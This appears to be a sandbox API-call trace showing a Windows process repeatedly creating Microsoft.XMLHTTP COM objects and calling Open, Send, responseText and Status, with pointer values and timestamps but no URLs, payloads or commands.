	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.723] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.723] SysStringLen (param_1=0x0) returned 0x0
	[0882.723] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.723] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0882.723] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0882.723] ??2@YAPEAX_K@Z () returned 0x62f310
	[0882.723] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f310) 
	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.723] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0882.723] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0882.724] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0882.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.724] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0882.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.724] longjmp () 
	[0882.724] longjmp () 
	[0882.724] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.724] SysStringLen (param_1=0x0) returned 0x0
	[0882.724] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.724] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0882.724] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0882.725] ??2@YAPEAX_K@Z () returned 0x62f330
	[0882.725] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0882.725] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.725] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0882.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0882.725] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0882.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0882.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.725] longjmp () 
	[0882.725] longjmp () 
	[0882.726] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0882.726] SysStringLen (param_1=0x0) returned 0x0
	[0882.726] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0882.726] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0882.726] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0882.726] ??2@YAPEAX_K@Z () returned 0x62f310
	[0882.726] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0882.726] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0882.726] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0882.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0882.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0882.727] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0882.727] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0884.103] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0884.103] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0884.103] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0884.103] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0884.103] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0884.103] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0891.279] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0891.280] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0891.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0891.281] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.281] SysStringLen (param_1=0x0) returned 0x0
	[0891.281] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.282] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0891.282] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0891.282] ??2@YAPEAX_K@Z () returned 0x62f310
	[0891.282] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0891.282] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.282] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0891.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0891.282] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0891.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.282] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.285] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.285] SysStringLen (param_1=0x0) returned 0x0
	[0891.285] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.285] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0891.285] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0891.286] ??2@YAPEAX_K@Z () returned 0x62f330
	[0891.286] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0891.286] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.286] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0891.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0891.286] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0891.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.286] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.286] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.286] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.286] SysStringLen (param_1=0x0) returned 0x0
